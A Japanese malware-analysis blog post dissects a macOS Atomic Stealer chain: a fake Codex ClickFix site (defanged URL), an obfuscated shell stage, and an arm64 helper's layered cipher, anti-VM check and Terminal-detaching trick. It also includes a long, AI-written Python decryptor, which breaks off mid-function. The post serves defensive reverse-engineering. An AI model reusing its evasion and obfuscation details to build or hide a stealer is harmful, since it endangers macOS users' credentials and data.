はじめに
こちらの記事はmacOSを標的とした Atomic Stealer攻撃チェーンの分析とバイナリ解析による難読化解除を行う記事です。メインはバイナリ解析ですね。
以降記載する情報は実際のマルウェアサンプルが通信を行う宛先など含まれているため、取り扱いには十分注意してください。
Atomic Stealerとは
前回のビーコンの解析記事に記載しております。今回はビーコンを含まない、感染の初期フェーズから展開されていく検体を解析していきます。
攻撃チェーンの概要
今回の攻撃チェーンについてAIに簡易的に画像生成してもらいました。

以下の流れです。
- ClickFixでユーザにコマンドを実行させます
- ダウンロードしたShellスクリプトが実行されます
- Shellスクリプトによってダウンロードされたhelperバイナリが実行されます
- helperバイナリから生成されるosascriptによって機微情報が収集されます
- 集めた情報を外部に流出させます
各フェーズの詳細
ここからは各フェーズの解析をしていきます。
ClickFix
以下のURLにCodexのインストールを装ったサイトを4/26に観測しました。
hxxps[:]//chatgpt-codex[.]gitlab[.]io/cdx/?

このサイトのDownloadをクリックすると以下の画面が現れます。

MacのSpotlightをショートカット経由でターミナルを呼び出してコマンド実行させる典型的なClickFixですね。
簡易的にデコードするとURLが見えます。このURLをcurlに渡してコンテンツを取得し、zshに渡してシェルスクリプトを実行する流れになります。

Shellスクリプト
以下のシェルスクリプトがダウンロードされます。

難読化されていますが、デコードすると以下のコマンドを実行していることがわかります。

jetbrainsのアップデートを装ったURLからarm64バイナリを落としてき、xattr -cで拡張ファイル属性を全て無効化します。これによってMacのGatekeeperなどのセキュリティ機構が無効化されます。
その後、このバイナリが実行され、メインの動作が開始されます。
helperバイナリ
Binjaでこのarm64バイナリを解析していきます。
まずstartから見ていくとメインの関数が見えます。

この中身を見ていくと以下の2つの関数がまず見えます。

decrypt_substitution_tableについて詳しく確認します。

ざっと見、0x80バイトの文字列に対して偶数の場合は(x9_4 ^ 0x7c) - 0xf、奇数の場合は(x9_4 - 0x7c) ^ 0xfでバイト演算を行なっているように見えます。
どの領域かはアセンブリを読めばざっとわかります。

0x1000e8000の領域からadd x23, 0x190を実施し、カウンタx24で3ループしてx23レジスタに格納されてるメモリアドレスから8バイト減算してmemcpyで連結させています。b.neでカウンタが0になれば抜けますね。ポインタは0x10ずつ離れたバイト位置に存在しています。


このバイト列を演算し、Stringを生成します。UXYBWOqcFMlVLwGjが出てきます。
別のバイナリを確認すると、別のロジックも見えます。

hex_decode関数は0〜fのHEX表現をカスタムするためのテーブルを作成するものです。イメージは以下ですね。
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| U | X | Y | B | W | O | q | c | F | M | l | V | L | w | G | j |
これで今後続くステージのString文字列をhexに変換する機能を持ちます。上記以外の文字列は0xffで無効なものになります。

続いてmain_payloadに移り、このHEXを0xb4でXORします。

続いての処理に移ります。以下も大体似たような処理になります。

decrypt_encode_blob_?は先ほどのdecrypt_substitution_tableと似た様な動作をとります。

ここで出力されるUXYBWOqcFMlVLwGjの文字列のどれかを使った値をhex_decodeでhex値に変換します。
base64_decodeに渡す値はそのhexデコード値と、最初に変換したhex値のXOR0xb4のtableとなります。中身を追うと特徴的な6ビットシフトが見えます。base64ポイ動きです。

main_payloadの続きを確認すると、デコードした文字列をexec_shell_commandに渡しています。中身を見るとexeclしています。 Oh...

この実行結果は以下のx0レジスタに突っ込まれます。ざっとネタバレするとアンチVMの判定osascriptを回していて、その結果によってその後の挙動を変える動きをします。これはdynamic_keyの変数に変形されて入ります。

あとは似た動作をblob2からblob5まで復号動作を続けます。blob2からblob4までは先ほどの実行結果のdynamic_keyの値が復号で絡むので、VM検出された場合は復号が上手くいかず、Malware動作がそのまま終了する流れとなります。上手くいくとblob2からblob4で新たなosascriptが出現します。
blob5に関しては実行をどの場合もmain_payload内で実施し、disown; pkill Terminalコマンドを実施してClickFix起因のTerminalからこのMalwareのプロセスを切り離し、Terminalから落とす動作をします。

んじゃblob2-4の復号されたosascriptがどこで実行されるかですが、以下です。

これがStealerの本体の動きとなるosascriptを動かします。
osascript復号
流れがわかったのでAIにデコードスクリプトを書いてもらいました。各blobの復号演算アルゴリズムの動作がMalwareの検体によってバラバラだったので、総当たりして読みやすいものを生成させます。
#!/usr/bin/env python3
"""統合復号スクリプト - バイナリ自動解析によるパラメータ抽出
使用方法: python decrypt.py <binary_path>
"""
import sys
import struct, base64
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <binary_path>", file=sys.stderr)
sys.exit(1)
BINARY_PATH = sys.argv[1]
# =============================================================================
# Part 1: Mach-O Parser
# =============================================================================
class MachO:
"""ARM64 Mach-O / FAT binary parser"""
def __init__(self, path):
self.path = path
self.slice_offset = 0
self.segments = [] # [{name, vmaddr, vmsize, fileoff, filesize}]
self.sections = {} # "segment.section" -> {addr, size, fileoff}
self.entry_va = 0
self._find_arm64_slice()
self._parse_load_commands()
# --- FAT binary handling ---
def _find_arm64_slice(self):
with open(self.path, 'rb') as f:
magic = f.read(4)
if magic == b'\xcf\xfa\xed\xfe':
return
if magic in (b'\xca\xfe\xba\xbe', b'\xca\xfe\xba\xbf'):
is64 = (magic == b'\xca\xfe\xba\xbf')
nfat = struct.unpack('>I', f.read(4))[0]
for _ in range(nfat):
if is64:
ct, cs = struct.unpack('>2I', f.read(8))
off, sz = struct.unpack('>2Q', f.read(16))
f.read(8) # align, reserved
else:
ct, cs, off, sz, _ = struct.unpack('>5I', f.read(20))
if ct == 0x0100000C: # CPU_TYPE_ARM64
self.slice_offset = off
return
raise ValueError("ARM64 Mach-O slice not found")
# --- Load command parsing ---
def _parse_load_commands(self):
with open(self.path, 'rb') as f:
f.seek(self.slice_offset)
hdr = f.read(32)
_, _, _, _, ncmds, _, _, _ = struct.unpack('<8I', hdr)
for _ in range(ncmds):
pos = f.tell()
cmd, cmdsize = struct.unpack('<II', f.read(8))
if cmd == 0x19: # LC_SEGMENT_64
segname = f.read(16).split(b'\x00')[0].decode()
vmaddr, vmsize, fileoff, filesize = struct.unpack('<4Q', f.read(32))
_, _, nsects, _ = struct.unpack('<4I', f.read(16))
self.segments.append(dict(
name=segname, vmaddr=vmaddr, vmsize=vmsize,
fileoff=fileoff, filesize=filesize))
for _ in range(nsects):
raw = f.read(80)
sn = raw[:16].split(b'\x00')[0].decode()
sg = raw[16:32].split(b'\x00')[0].decode()
addr, size = struct.unpack('<2Q', raw[32:48])
offset = struct.unpack('<I', raw[48:52])[0]
key = f"{sg}.{sn}"
if key in self.sections:
key = f"{sg}.{sn}#{addr:x}"
self.sections[key] = dict(
addr=addr, size=size,
fileoff=self.slice_offset + offset, segment=sg)
elif cmd == 0x80000028: # LC_MAIN
entryoff = struct.unpack('<Q', f.read(8))[0]
text_seg = next(s for s in self.segments if s['name'] == '__TEXT')
self.entry_va = text_seg['vmaddr'] + entryoff
f.seek(pos + cmdsize)
# --- VA to file-offset (using segment mapping) ---
def va_to_offset(self, va):
for seg in self.segments:
if seg['vmaddr'] <= va < seg['vmaddr'] + seg['vmsize']:
return self.slice_offset + seg['fileoff'] + (va - seg['vmaddr'])
raise ValueError(f"VA 0x{va:x} not in any segment")
def read_va(self, va, size):
with open(self.path, 'rb') as f:
f.seek(self.va_to_offset(va))
return f.read(size)
def get_text_section(self):
for key, sec in self.sections.items():
if sec['segment'] == '__TEXT' and key.endswith('.__text'):
return sec
raise ValueError("__text section not found")
def get_const_sections(self):
return {k: v for k, v in self.sections.items()
if 'const' in k.lower() and v['segment'] == '__TEXT'}
def get_stubs_section(self):
for key, sec in self.sections.items():
if '__stubs' in key and 'helper' not in key:
return sec
return None
# =============================================================================
# Part 2: ARM64 Minimal Instruction Decoder
# =============================================================================
def decode_adrp(word, pc):
"""ADRP Xd, label → (rd, page_addr) or None"""
if (word & 0x9F000000) != 0x90000000:
return None
rd = word & 0x1F
immlo = (word >> 29) & 0x3
immhi = (word >> 5) & 0x7FFFF
imm = (immhi << 2) | immlo
if imm & (1 << 20):
imm -= (1 << 21)
page = ((pc & ~0xFFF) + (imm << 12)) & 0xFFFFFFFFFFFFFFFF
return rd, page
def decode_add_imm64(word):
"""ADD Xd, Xn, #imm (64-bit, no shift) → (rd, rn, imm) or None"""
if (word & 0xFFC00000) != 0x91000000:
return None
return word & 0x1F, (word >> 5) & 0x1F, (word >> 10) & 0xFFF
def decode_bl(word, pc):
"""BL target → target_va or None"""
if (word >> 26) != 0x25:
return None
imm26 = word & 0x3FFFFFF
if imm26 & (1 << 25):
imm26 -= (1 << 26)
return (pc + imm26 * 4) & 0xFFFFFFFFFFFFFFFF
def decode_movz(word):
"""MOVZ Wd/Xd, #imm{, lsl #shift} → (rd, value, sf) or None"""
if (word & 0x7F800000) not in (0x52800000, 0xD2800000):
return None
sf = (word >> 31) & 1
rd = word & 0x1F
imm16 = (word >> 5) & 0xFFFF
hw = (word >> 21) & 0x3
return rd, imm16 << (hw * 16), sf
def decode_movk(word):
"""MOVK Wd/Xd, #imm{, lsl #shift} → (rd, imm16, shift) or None"""
if (word & 0x7F800000) not in (0x72800000, 0xF2800000):
return None
rd = word & 0x1F
imm16 = (word >> 5) & 0xFFFF
hw = (word >> 21) & 0x3
return rd, imm16, hw * 16
# =============================================================================
# Part 3: Hex Table Auto-Detection
# =============================================================================
def find_hex_table(mo):
"""Scan __const for a 256-byte nibble lookup table (16 entries 0x00-0x0F, rest 0xFF).
Returns (table_va, hex_map dict, alphabet_string)."""
for _, sec in mo.get_const_sections().items():
data = mo.read_va(sec['addr'], sec['size'])
for i in range(len(data) - 255):
block = data[i:i + 256]
nibbles = set()
ff_count = 0
ok = True
for b in block:
if b == 0xFF:
ff_count += 1
elif b <= 0x0F:
nibbles.add(b)
else:
ok = False
break
if ok and nibbles == set(range(16)) and ff_count == 240:
va = sec['addr'] + i
hex_map = {}
alphabet = ['?'] * 16
for j, b in enumerate(block):
if b != 0xFF:
hex_map[j] = b # ascii_byte -> nibble
alphabet[b] = chr(j)
return va, hex_map, ''.join(alphabet)
raise ValueError("Hex nibble lookup table not found in __const")
# =============================================================================
# Part 4: Code Analysis — Data References, Function Calls, Sizes
# =============================================================================
def scan_text_section(mo):
"""Scan __text for ADRP+ADD data refs, BL calls, and MOVZ/MOVK immediates.
Returns dict with: data_refs, bl_calls, stubs_range."""
text = mo.get_text_section()
code = mo.read_va(text['addr'], text['size'])
code_va = text['addr']
stubs = mo.get_stubs_section()
stubs_range = (stubs['addr'], stubs['addr'] + stubs['size']) if stubs else (0, 0)
adrp_regs = {} # rd -> (page, pc)
data_refs = [] # (target_va, adrp_pc, add_pc)
bl_calls = [] # (caller_pc, target_va, is_import)
movz_at = {} # pc -> (rd, value)
for off in range(0, len(code) - 3, 4):
pc = code_va + off
w = struct.unpack('<I', code[off:off + 4])[0]
a = decode_adrp(w, pc)
if a:
adrp_regs[a[0]] = (a[1], pc)
continue
b = decode_add_imm64(w)
if b and b[1] in adrp_regs:
rd, rn, imm12 = b
page, adrp_pc = adrp_regs[rn]
full = page + imm12
data_refs.append((full, adrp_pc, pc))
continue
t = decode_bl(w, pc)
if t is not None:
is_imp = stubs_range[0] <= t < stubs_range[1]
bl_calls.append((pc, t, is_imp))
continue
mz = decode_movz(w)
if mz:
movz_at[pc] = (mz[0], mz[1])
continue
mk = decode_movk(w)
if mk:
rd, imm16, shift = mk
# Update most recent movz for same register
for prev_pc in sorted(movz_at, reverse=True):
if movz_at[prev_pc][0] == rd:
old_val = movz_at[prev_pc][1]
mask = ~(0xFFFF << shift) & 0xFFFFFFFFFFFFFFFF
movz_at[prev_pc] = (rd, (old_val & mask) | (imm16 << shift))
break
return dict(data_refs=data_refs, bl_calls=bl_calls,
stubs_range=stubs_range, movz_at=movz_at,
text_start=code_va, text_end=code_va + text['size'])
def find_function_starts(scan, entry_va=0):
"""Determine function start addresses from BL targets and entry point."""
text_s, text_e = scan['text_start'], scan['text_end']
starts = set()
for _, target, is_imp in scan['bl_calls']:
if not is_imp and text_s <= target < text_e:
starts.add(target)
starts.add(text_s) # first function
if text_s <= entry_va < text_e:
starts.add(entry_va) # OS entry point (_start)
return sorted(starts)
def group_refs_by_function(scan, func_starts):
"""Assign each data_ref to the function it appears in."""
funcs = {}
for i, fs in enumerate(func_starts):
fe = func_starts[i + 1] if i + 1 < len(func_starts) else scan['text_end']
refs = [(va, apc, addpc) for va, apc, addpc in scan['data_refs']
if fs <= apc < fe]
calls = [(cpc, tgt, imp) for cpc, tgt, imp in scan['bl_calls']
if fs <= cpc < fe]
funcs[fs] = dict(start=fs, end=fe, data_refs=refs, calls=calls)
return funcs
def _deref_pointer_table(mo, ref_va, tc_range, hex_excl):
"""Read (addr, size) pairs from a pointer table in __DATA_CONST.
The table alternates: [data_va:8, chunk_size:8, data_va:8, chunk_size:8, ...]"""
tc_start, tc_end = tc_range
chunks = []
# Determine if ref_va points to addr or size, align to pair boundary
try:
first = struct.unpack('<Q', mo.read_va(ref_va, 8))[0]
except Exception:
return []
if tc_start <= first < tc_end:
start = ref_va # starts at addr
elif 0 < first < 0x200000:
start = ref_va - 8 # starts at size → back up to addr
else:
return []
for off in range(0, 0x200, 16):
try:
raw = mo.read_va(start + off, 16)
addr = struct.unpack('<Q', raw[0:8])[0]
size = struct.unpack('<Q', raw[8:16])[0]
if (tc_start <= addr < tc_end and 0 < size < 0x200000
and not (hex_excl[0] <= addr < hex_excl[1])):
# Size consistency: stop if size differs >3x from first entry
if chunks:
ref_size = chunks[0][1]
if ref_size > 0 and (size > ref_size * 3 or size < ref_size // 3):
break
chunks.append((addr, size))
else:
break
except Exception:
break
return chunks
def find_memcpy_chunks(func_info, scan, mo, hex_table_va=0):
"""Extract (data_va, size) pairs from a function's data refs.
Handles both:
- Direct ADRP+ADD → __TEXT.__const (helper_2 style)
- Indirect ADRP+ADD → __DATA_CONST pointer table → __TEXT.__const (helper style)
"""
# Determine __TEXT.__const range
tc_start, tc_end = 0, 0
for key, sec in mo.sections.items():
if sec['segment'] == '__TEXT' and 'const' in key.lower():
s, e = sec['addr'], sec['addr'] + sec['size']
tc_start = s if tc_start == 0 else min(tc_start, s)
tc_end = max(tc_end, e)
if tc_start == 0:
return []
hex_excl = (hex_table_va, hex_table_va + 256) if hex_table_va else (0, 0)
text_sec = mo.get_text_section()
code_range = (text_sec['addr'], text_sec['addr'] + text_sec['size'])
# Collect all MOVZ w2/x2 in this function (memcpy size arguments)
func_movz_x2 = sorted(
[(mpc, val) for mpc, (rd, val) in scan['movz_at'].items()
if func_info['start'] <= mpc < func_info['end'] and rd == 2 and val > 0])
chunks = []
used_movz = set()
seen_addrs = set()
for ref_va, apc, addpc in func_info['data_refs']:
# Skip code-section refs and hex table refs
if code_range[0] <= ref_va < code_range[1]:
continue
if hex_excl[0] <= ref_va < hex_excl[1]:
continue
if tc_start <= ref_va < tc_end:
# --- Direct reference to __TEXT.__const ---
# Skip metadata area near start of __const (string descriptors etc.)
if ref_va < tc_start + 0x200:
continue
if ref_va in seen_addrs:
continue
seen_addrs.add(ref_va)
# Find nearest MOVZ x2 at or after the ADRP (size loaded before bl)
best_size, best_pc = None, None
for mpc, val in func_movz_x2:
if mpc >= apc and mpc not in used_movz:
best_size, best_pc = val, mpc
break
if best_pc:
used_movz.add(best_pc)
chunks.append((ref_va, best_size))
else:
# --- Possibly a pointer table in __DATA_CONST ---
ptrs = _deref_pointer_table(mo, ref_va, (tc_start, tc_end), hex_excl)
for addr, size in ptrs:
if addr not in seen_addrs:
seen_addrs.add(addr)
chunks.append((addr, size))
# Fill missing sizes using sorted gaps
if chunks and any(sz is None for _, sz in chunks):
sorted_c = sorted(chunks, key=lambda x: x[0])
known_gaps = []
# First pass: fill sizes from gaps to next chunk
for i, (va, sz) in enumerate(sorted_c):
if sz is not None:
continue
if i + 1 < len(sorted_c):
gap = sorted_c[i + 1][0] - va
if 0 < gap < 0x200000:
sorted_c[i] = (va, gap)
known_gaps.append(gap)
continue
# Second pass: fill remaining using most common gap or MOVZ
for i, (va, sz) in enumerate(sorted_c):
if sz is not None:
continue
if known_gaps:
from collections import Counter
sorted_c[i] = (va, Counter(known_gaps).most_common(1)[0][0])
else:
all_movz = [v for mpc, (rd, v) in scan['movz_at'].items()
if func_info['start'] <= mpc < func_info['end'] and v > 8]
if all_movz:
from collections import Counter
sorted_c[i] = (va, Counter(all_movz).most_common(1)[0][0])
chunks = sorted_c
return chunks
# =============================================================================
# Part 5: Algorithm Auto-Detection via Hex Table Validation
# =============================================================================
def _valid_hex_set(hex_map):
return set(hex_map.keys())
def try_single_xor(data, valid):
for k in range(256):
if all((b ^ k) in valid for b in data[:200]):
dec = bytes(b ^ k for b in data)
if all(c in valid for c in dec):
return ('single_xor', k), dec
return None, None
def try_running_xor(data, valid, multipliers=(0x1F,)):
for mul in multipliers:
for init in range(256):
key = init
ok = True
for b in data[:200]:
d = (b ^ key) & 0xFF
if d not in valid:
ok = False
break
key = (d + key * mul) & 0xFFFFFFFF
if ok:
out = bytearray()
key = init
for b in data:
d = (b ^ key) & 0xFF
out.append(d)
key = (d + key * mul) & 0xFFFFFFFF
if all(c in valid for c in out):
return ('running_xor', init, mul), bytes(out)
return None, None
def try_running_sum(data, valid, addends=(0x0D,)):
for addend in addends:
for init in range(256):
key = init
ok = True
for b in data[:200]:
d = (key + (~b & 0xFF)) & 0xFF
if d not in valid:
ok = False
break
key = (key + d + addend) & 0xFFFFFFFF
if ok:
out = bytearray()
key = init
for b in data:
d = (key + (~b & 0xFF)) & 0xFF
out.append(d)
key = (key + d + addend) & 0xFFFFFFFF
if all(c in valid for c in out):
return ('running_sum', init, addend), bytes(out)
return None, None
def _try_alt_form(data, valid, solve_even, solve_odd):
"""Try an alternating cipher form. For each constant C, intersect valid A values
across multiple test bytes. Returns (even_candidates, odd_candidates) or None."""
even_candidates = []
for c in range(256):
valid_a = None
for idx in range(0, min(20, len(data)), 2):
local_a = set()
for h in valid:
a = solve_even(data[idx], h, c)
if 0 <= (a & 0xFF) < 256:
local_a.add(a & 0xFF)
valid_a = local_a if valid_a is None else (valid_a & local_a)
if not valid_a:
break
if valid_a:
for a in valid_a:
even_candidates.append((a, c))
if not even_candidates:
return None
odd_candidates = []
for c in range(256):
valid_a = None
for idx in range(1, min(21, len(data)), 2):
local_a = set()
for h in valid:
a = solve_odd(data[idx], h, c)
if 0 <= (a & 0xFF) < 256:
local_a.add(a & 0xFF)
valid_a = local_a if valid_a is None else (valid_a & local_a)
if not valid_a:
break
if valid_a:
for a in valid_a:
odd_candidates.append((a, c))
if not odd_candidates:
return None
return even_candidates, odd_candidates
def try_alternating(data, valid):
"""Try 4 forms of alternating cipher. Returns (algo_info, decrypted) or (None, None)."""
forms = [
# (name, even: (b^A)-C, solve A from target h: A = b ^ ((h+C)&0xFF))
("xor_sub/sub_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF), # even: (b^A)-C=h -> A=b^(h+C)
lambda b, h, c: (b - (h ^ c)) & 0xFF, # odd: (b-D)^E=h -> D=(b-(h^E))
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_sub/add_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF, # odd: (b+D)^E=h -> D=(h^E)-b
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
("xor_add/sub_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF), # even: (b^A)+C=h -> A=b^(h-C)
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_add/add_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
for name, solve_even, solve_odd, apply_even, apply_odd in forms:
result = _try_alt_form(data, valid, solve_even, solve_odd)
if result is None:
continue
even_list, odd_list = result
# Validate each candidate pair on larger data
for ea, ec in even_list:
for od, oe in odd_list:
ok = True
for i in range(min(500, len(data))):
b = data[i]
d = apply_even(b, ea, ec) if i % 2 == 0 else apply_odd(b, od, oe)
if d not in valid:
ok = False
break
if ok:
out = bytearray()
for i, b in enumerate(data):
out.append(apply_even(b, ea, ec) if i % 2 == 0 else apply_odd(b, od, oe))
return (name, ea, ec, od, oe), bytes(out)
return None, None
def try_position_dependent(data, valid):
"""Try position-dependent cipher: ((i - i*8 + b + A) & 0xFF) ^ B"""
for xor_c in range(256):
for add_c in range(256):
ok = True
for i in range(min(200, len(data))):
d = (((i & 0xFF) - ((i * 8) & 0xFF) + data[i] + add_c) & 0xFF) ^ xor_c
if d not in valid:
ok = False
break
if ok:
out = bytearray()
for i, b in enumerate(data):
out.append((((i & 0xFF) - ((i * 8) & 0xFF) + b + add_c) & 0xFF) ^ xor_c)
if all(c in valid for c in out):
return ('position_dep', add_c, xor_c), bytes(out)
return None, None
def auto_detect_algorithm(data, valid):
"""Try all known algorithms and return (algo_info, decrypted_data).
Order: most specific first to avoid false-positive matches."""
# Alternating first (most specific — won't false-match simpler ciphers)
info, dec = try_alternating(data, valid)
if info:
return info, dec
# Then simpler ciphers
info, dec = try_single_xor(data, valid)
if info:
return info, dec
info, dec = try_running_xor(data, valid)
if info:
return info, dec
info, dec = try_running_sum(data, valid)
if info:
return info, dec
info, dec = try_position_dependent(data, valid)
if info:
return info, dec
return None, None
# =============================================================================
# Part 6: Custom Hex Decode & Hashtable Decode
# =============================================================================
def custom_hex_decode(data, hex_map):
out = bytearray()
length = len(data) & ~1 # ensure even length
for i in range(0, length, 2):
high = hex_map.get(data[i])
low = hex_map.get(data[i + 1])
if high is None or low is None:
raise ValueError(
f"Invalid hex at offset {i}: 0x{data[i]:02x} 0x{data[i+1]:02x}")
out.append((high << 4) | low)
return bytes(out)
def base64_decode(encoded, table):
B64 = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
ht = {b: B64[pos] for pos, b in enumerate(table)}
b64_str = bytearray(c for b in encoded for c in [ht.get(b)] if c is not None)
b64_str += b'=' * ((4 - len(b64_str) % 4) % 4)
return base64.b64decode(bytes(b64_str))
# =============================================================================
# Part 7: Pipeline Builder & Executor
# =============================================================================
def build_pipeline(mo, scan, hex_map, hex_table_va):
"""Trace from _start → main, analyze each sub-function, build decrypt pipeline."""
valid = _valid_hex_set(hex_map)
# Find function starts and filter cross-function ADRP+ADD pairs
func_starts = find_function_starts(scan, mo.entry_va)
# Post-filter: keep only data_refs where ADRP and ADD are in the same function
def _func_of(pc):
for i in range(len(func_starts) - 1, -1, -1):
if func_starts[i] <= pc:
return func_starts[i]
return 0
scan['data_refs'] = [(va, apc, addpc) for va, apc, addpc in scan['data_refs']
if _func_of(apc) == _func_of(addpc)]
func_map = group_refs_by_function(scan, func_starts)
# Trace _start → main: entry calls a function which is "main"
entry_func = func_map.get(mo.entry_va)
if not entry_func:
# Entry might not be at a function start; find the containing function
for fs in reversed(func_starts):
if fs <= mo.entry_va:
entry_func = func_map[fs]
break
# main = first non-import BL target from _start
main_va = None
for cpc, tgt, imp in sorted(scan['bl_calls']):
if entry_func and entry_func['start'] <= cpc < entry_func['end'] and not imp:
if scan['text_start'] <= tgt < scan['text_end']:
main_va = tgt
break
if main_va is None:
raise ValueError("Could not find main function from entry point")
main_func = func_map.get(main_va)
if not main_func:
raise ValueError(f"main at 0x{main_va:x} not in function map")
print(f"[INFO] _start=0x{mo.entry_va:x}, main=0x{main_va:x}")
# Collect sub-functions called from main (in call order, non-import only)
sub_funcs = []
seen = set()
for cpc, tgt, imp in sorted(main_func['calls']):
if not imp and tgt != main_va and tgt not in seen:
if tgt in func_map:
sub_funcs.append(func_map[tgt])
seen.add(tgt)
print(f"[INFO] main calls {len(sub_funcs)} sub-functions")
# For each sub-function, extract data chunks, validate each individually,
# and group valid chunks by detected algorithm.
analyzed = []
for sf in sub_funcs:
all_chunks = find_memcpy_chunks(sf, scan, mo, hex_table_va)
if not all_chunks:
continue
# For chunks with unknown size, try most common size from known chunks
known_sizes = [sz for _, sz in all_chunks if sz is not None and sz > 0]
if known_sizes:
from collections import Counter
fallback_size = Counter(known_sizes).most_common(1)[0][0]
else:
fallback_size = None
# Validate each chunk individually with auto-detection
by_algo = {} # algo_name -> [(cva, csz, algo, decrypted), ...]
for cva, csz in all_chunks:
if csz is None:
csz = fallback_size
if csz is None or csz < 4:
continue
try:
raw = mo.read_va(cva, csz)
algo, dec = auto_detect_algorithm(raw, valid)
if algo:
key = algo[0] # group by algorithm type name
by_algo.setdefault(key, []).append((cva, csz, algo, dec))
except Exception:
pass
if not by_algo:
continue
# Pick the algorithm group with the largest total byte count
best_group = max(by_algo.values(), key=lambda g: sum(sz for _, sz, _, _ in g))
# Build the analyzed entry from the best group
chunks_info = [(cva, csz) for cva, csz, _, _ in best_group]
total_dec = b"".join(dec for _, _, _, dec in best_group)
total_raw = sum(csz for _, csz, _, _ in best_group)
algo_info = best_group[0][2]
# Store raw data for re-decryption in post-XOR validation
raw_bytes = b""
for cva, csz in chunks_info:
raw_bytes += mo.read_va(cva, csz)
analyzed.append(dict(
func_va=sf['start'],
chunks=chunks_info,
raw_size=total_raw,
algo=algo_info,
decrypted=total_dec,
raw_data=raw_bytes,
))
# Debug: show rejected chunks
rejected = len(all_chunks) - len(chunks_info)
extra = f" (rejected {rejected}/{len(all_chunks)})" if rejected else ""
print(f" func 0x{sf['start']:x}: {len(chunks_info)} chunks, "
f"{total_raw} bytes, algo={algo_info[0]}{extra}")
return main_func, analyzed
def find_post_xor_and_key(analyzed, hex_map, mo):
"""Find the XOR key by trying all alternating cipher forms + all post-XOR values,
validated by base64_decode producing printable ASCII."""
key_entry = analyzed[0]
valid = _valid_hex_set(hex_map)
# Re-read raw key data from binary
raw_key = b""
for cva, csz in key_entry['chunks']:
raw_key += mo.read_va(cva, csz)
# Find a small validation blob (blob1 or similar)
threshold = _payload_threshold(analyzed, key_entry) if len(analyzed) > 1 else 999999
val_entry = None
for e in analyzed[1:]:
if e['raw_size'] < threshold and e.get('raw_data'):
val_entry = e
break
# All 4 alternating cipher forms (used for both key AND validation blob)
forms = [
("xor_sub/sub_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_sub/add_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
("xor_add/sub_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_add/add_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
def _decrypt_with_form(raw, apply_e, apply_o, ea, ec, od, oe):
"""Decrypt raw data with given alternating form and constants."""
out = bytearray()
for i, b in enumerate(raw):
d = apply_e(b, ea, ec) if i % 2 == 0 else apply_o(b, od, oe)
if d not in valid:
return None
out.append(d)
return bytes(out)
# Pre-compute all valid (form, constants, hex-decoded) for both key and val blob
key_candidates = [] # [(form_name, hex_decoded_key)]
val_candidates = [] # [(form_name, hex_decoded_val)]
for fname, solve_e, solve_o, apply_e, apply_o in forms:
# Key candidates
result = _try_alt_form(raw_key, valid, solve_e, solve_o)
if result:
for ea, ec in result[0][:3]:
for od, oe in result[1][:3]:
dec = _decrypt_with_form(raw_key, apply_e, apply_o, ea, ec, od, oe)
if dec:
try:
key_candidates.append((fname, custom_hex_decode(dec, hex_map)))
except Exception:
pass
# Validation blob candidates
if val_entry:
result2 = _try_alt_form(val_entry['raw_data'], valid, solve_e, solve_o)
if result2:
for ea2, ec2 in result2[0][:2]:
for od2, oe2 in result2[1][:2]:
dec2 = _decrypt_with_form(
val_entry['raw_data'], apply_e, apply_o, ea2, ec2, od2, oe2)
if dec2:
try:
val_candidates.append(
(fname, custom_hex_decode(dec2, hex_map)))
except Exception:
pass
print(f" [search] key candidates={len(key_candidates)}, "
f"val candidates={len(val_candidates)}")
# Cross-validate: for each (key_candidate, val_candidate, post_xor), score
best_score, best_xor, best_key = -1, 0, None
for _, key_hex in key_candidates:
for x in range(256):
ck = bytes(b ^ x for b in key_hex)
for _, vh in val_candidates:
try:
decoded = base64_decode(vh, ck)
score = sum(1 for b in decoded
if 32 <= b < 127 or b in (9, 10, 13))
except Exception:
score = 0
if score > best_score:
best_score = score
best_xor = x
best_key = ck
if best_key is None:
raise ValueError("Could not determine XOR key")
print(f"[INFO] Post-XOR=0x{best_xor:02x}, key size={len(best_key)}, "
f"validation score={best_score}")
print(f"[Stage 1] XOR鍵 (0x{len(best_key):x} bytes): {best_key.hex()}")
return key_entry, best_key, best_xor
def _all_alternating_decryptions(raw, valid):
"""Yield all valid alternating-cipher decryptions of raw data (all 4 forms)."""
_forms = [
(lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
